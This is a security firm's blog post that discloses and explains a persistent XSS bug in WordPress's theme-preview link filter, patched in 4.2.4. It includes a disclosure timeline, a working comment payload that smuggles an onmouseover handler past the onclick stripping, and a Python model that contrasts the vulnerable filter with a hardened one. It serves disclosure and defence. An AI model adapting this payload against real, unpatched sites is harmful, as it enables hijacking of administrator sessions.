Sucuri Blog
Persistent XSS Vulnerability in WordPress Explained

August 11, 2015, by Marc-Alexandre Montpas

Security Risk: Dangerous

Exploitation Level: Easy

DREAD Score: 6/10

Vulnerability: Persistent XSS

Patched Version: 4.2.4


Last week the WordPress team released a patch that fixed six security vulnerabilities. One of the six is an issue we identified a few months back.

Vulnerability Disclosure Timeline:
May 6th, 2015 – Initial report to WordPress security team
May 8th, 2015 – WordPress security team confirming receipt of the report
July 23rd, 2015 – WordPress 4.2.3 released, not fixing the issue
July 24th, 2015 – WordPress security team confirming it will be fixed on the next security release
August 4th, 2015 – Patch made public with the release of WordPress 4.2.4

Technical Details

The bug lies in the preview_theme() function, which WordPress uses to temporarily preview what a specific theme will look like. It is hooked to the setup_theme action, which runs every time a theme is about to be displayed.

Screenshot: the preview_theme() function

As the screenshot shows, if a logged-in administrator visits one of the site's pages with a few additional $_GET parameters (which can happen, for example, if they click a malicious link beforehand), this function registers preview_theme_ob_filter as the callback of ob_start().

Screenshot: the preview_theme_ob_filter callback function

Once the output buffer has collected the whole page, preview_theme_ob_filter() runs over it, grabs every HTML link and filters each one through the preview_theme_ob_filter_callback function.

Screenshot: the preview_theme_ob_filter_callback function

That callback will, among other things, remove onclick="..." event handlers from the link tags.

Where is the Issue?

The problem occurs in the way preview_theme_ob_filter_callback removes the onclick="..." handlers. Because the handler is cut out of the raw text of the tag after the tag has already been written into the page, an attacker can use that deletion to splice new attributes into an HTML link, by submitting a tag similar to the following in a post comment:

<a href='/wp-admin/' title="onclick='" Title='" style="position:absolute;top:0;left:0;width:100%;height:100%;display:block;" onmouseover=alert(1)//'>Test</a>

The removed part is everything from onclick=' up to the next unescaped single quote, that is, the sequence onclick='" Title=' that sits inside the first title attribute. Cutting it out accidentally joins what was only attribute text into real style and onmouseover attributes, and the administrator's browser receives the following link tag:

<a href='/wp-admin/' title="" style="position:absolute;top:0;left:0;width:100%;height:100%;display:block;" onmouseover=alert(1)//'>Test</a>

This bypasses the filters that were in place to keep comment-supplied JavaScript from executing. Note that the style attribute stretches the link over the whole viewport, so the onmouseover handler fires as soon as the administrator moves the mouse, and because the payload is stored in a comment it triggers for every administrator who loads that page in theme-preview mode.
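To make the splice visible, here is an added Python model of the filter; it is example code written for this post, not code from WordPress. The two regular expressions are assumed transcriptions of the PCRE patterns in WordPress 4.2.3, the model reproduces only the onclick-stripping step of the callback (the link-rewriting step is left out), and Python's html.parser stands in for a browser's tokenizer so the attributes each version of the tag ends up with can be compared. The hardened_filter function illustrates the general remedy of deciding per parsed attribute and re-serialising the tag; it is not the fix WordPress shipped in 4.2.4.

```python
import re
from html import escape
from html.parser import HTMLParser

# Constructed sample input: the comment payload quoted in the post, as it
# would sit in the rendered page body just before the output-buffer filter runs.
PAYLOAD = (
    "<a href='/wp-admin/' title=\"onclick='\" Title='\" "
    "style=\"position:absolute;top:0;left:0;width:100%;height:100%;display:block;\" "
    "onmouseover=alert(1)//'>Test</a>"
)

# Python translations of the two PCRE patterns used by the filter (assumption:
# transcribed from the WordPress 4.2.3 source). Only the onclick-stripping step
# of the callback is modelled; the link-rewriting step is left out.
LINK_RE = re.compile(r"""(<a.*?href=(["']))(.*?)(["'].*?>)""")
ONCLICK_RE = re.compile(r"""onclick=(['"]).*?(?<!\\)\1""", re.IGNORECASE)


def vulnerable_filter(content):
    """Model of preview_theme_ob_filter(): for every <a ... href=...> tag, cut any
    onclick="..." / onclick='...' substring out of the raw tag text with a regex.
    The deletion shifts where the quotes fall, which is the whole bug."""
    def callback(match):
        rest = match.group(4)
        if "onclick" in rest:
            rest = ONCLICK_RE.sub("", rest)
        return match.group(1) + match.group(3) + rest
    return LINK_RE.sub(callback, content)


class _LinkAttrs(HTMLParser):
    """Collects the attributes a browser-style tokenizer assigns to <a> tags."""
    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self.attrs.extend(attrs)


def link_attributes(fragment):
    """(name, value) pairs of every <a> tag in fragment, names lower-cased, in
    document order. Duplicates are kept so they stay visible; a browser would
    keep only the first occurrence of a name (Title and title are the same name)."""
    parser = _LinkAttrs()
    parser.feed(fragment)
    parser.close()
    return parser.attrs


def event_handlers(fragment):
    """Names of the on* attributes a browser would actually wire up."""
    return [name for name, _ in link_attributes(fragment) if name.startswith("on")]


def hardened_filter(content):
    """Illustrative safe alternative (not the WordPress 4.2.4 fix): decide per
    parsed attribute, keep the first occurrence of each name like a browser does,
    drop on* handlers, and re-serialise with quoted, escaped values so the output
    cannot be tokenised differently from the way the input was."""
    def rebuild(match):
        kept, seen = [], set()
        for name, value in link_attributes(match.group(0)):
            if name in seen or name.startswith("on"):
                continue
            seen.add(name)
            kept.append(name if value is None else f'{name}="{escape(value, quote=True)}"')
        return "<a " + " ".join(kept) + ">"
    return LINK_RE.sub(rebuild, content)


if __name__ == "__main__":
    print("before filter:", event_handlers(PAYLOAD))                     # []
    print("vulnerable:   ", event_handlers(vulnerable_filter(PAYLOAD)))  # ['onmouseover']
    print("hardened:     ", event_handlers(hardened_filter(PAYLOAD)))    # []
```

Run it directly to print the event-handler names before and after each filter. Before filtering, the browser-style tokenizer sees href and two title attributes (the payload spells the second one Title, but attribute names are case-insensitive and a browser keeps only the first) and no event handler at all; after vulnerable_filter it sees style and onmouseover, exactly the tag shown above. A genuine onclick="..." on an ordinary link is still removed by both versions, so the model also shows what the original code was trying to do. The hardened variant emits a freshly quoted tag from the parsed attribute list, so no deletion can turn attribute text into attribute syntax.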

Updates Are Out, Ensure You Don’t Miss Them

If your site supports automatic updates, chances are it has already been patched. If they are disabled, you'll want to update manually at your earliest convenience. We also recommend investing in a technology that can help proactively protect against vulnerabilities like the ones recently patched, such as a Website Firewall (WAF).


Categories: Vulnerability Disclosure, WordPress Security. Tags: XSS

About Marc-Alexandre Montpas

Marc-Alexandre Montpas is Sucuri’s Senior Security Analyst who joined the company in 2014. Marc’s main responsibilities include reversing security patches and scavenging vulnerabilities, old and new. His professional experience covers eight years of finding bugs in open-source software. When Marc isn’t breaking things, you might find him participating in a hacking CTF competition. Connect with him on Twitter.

Comments

  1. Sinan İŞLER

    August 11, 2015

    The problem is that the WordPress security team is not enough. Before release they should find those bugs or vulnerabilities. But they are not doing it because the team is not enough. The WP Security team must grow.

  2. Joe Barrett

    September 14, 2015

    So this has to be done by an admin?

  3. Anonymous

    November 24, 2016

    alert(XSS)
